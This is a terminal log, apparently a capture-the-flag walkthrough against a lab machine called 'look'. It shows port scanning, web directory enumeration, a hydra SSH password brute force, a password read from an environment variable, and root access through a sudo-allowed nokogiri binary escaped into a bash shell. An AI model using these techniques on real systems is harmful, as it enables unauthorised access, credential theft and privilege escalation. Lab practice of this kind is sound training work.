❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.85
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-16 11:45 CET
Nmap scan report for 192.168.1.85
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

❯ nmap -sVC -p22,80 192.168.1.85
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-16 12:08 CET
Nmap scan report for 192.168.1.85
Host is up (0.00069s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)

❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.85/ -x php,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.85/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/info.php             (Status: 200) [Size: 69374]
/look.php             (Status: 200) [Size: 76]
Progress: 882184 / 882188 (100.00%)
===============================================================
Finished
===============================================================

❯ hydra -t 64 -l axel -P /opt/techyou.txt ssh://192.168.1.85 -F -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-16 12:24:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10000 login tries (l:1/p:10000), ~157 tries per task
[DATA] attacking ssh://192.168.1.85:22/
[STATUS] 624.00 tries/min, 624 tries in 00:01h, 9416 to do in 00:16h, 24 active
[22][ssh] host: 192.168.1.85   login: axel   password: bambam
[STATUS] attack finished for 192.168.1.85 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

❯ ssh axel@192.168.1.85
axel@192.168.1.85's password: 
axel@look:~$ id ; hostname
uid=1000(axel) gid=1000(axel) grupos=1000(axel)
look

axel@look:~$ env
SHELL=/bin/bash
PWD=/home/axel
LOGNAME=axel
XDG_SESSION_TYPE=tty
MOTD_SHOWN=pam
HOME=/home/axel
LANG=es_ES.UTF-8
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=192.168.1.10 51066 192.168.1.85 22
XDG_SESSION_CLASS=user
TERM=xterm-256color
USER=axel
SHLVL=1
XDG_SESSION_ID=6
XDG_RUNTIME_DIR=/run/user/1000
SSH_CLIENT=192.168.1.10 51066 22
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
dylanPASS=bl4bl4Dyl4N
SSH_TTY=/dev/pts/0
_=/usr/bin/env

axel@look:~$ echo $dylanPASS
bl4bl4Dyl4N

axel@look:~$ su - dylan
Contraseña: 
dylan@look:~$ id ; hostname
uid=1001(dylan) gid=1001(dylan) grupos=1001(dylan)
look

dylan@look:~$ sudo -l
Matching Defaults entries for dylan on look:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dylan may run the following commands on look:
    (root) NOPASSWD: /usr/bin/nokogiri

dylan@look:~$ sudo -u root /usr/bin/nokogiri /etc/passwd
Your document is stored in @doc...
irb(main):001:0> exec '/bin/bash -i'
root@look:/home/dylan# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
look

root@look:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
5e1a6***************************
084eb***************************